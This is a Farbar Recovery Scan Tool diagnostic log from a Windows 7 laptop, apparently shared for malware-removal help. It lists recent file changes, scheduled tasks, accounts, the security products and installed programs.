2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 01:54 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-19 01:54 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-19 01:48 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-19 01:44 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 01:58:18)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
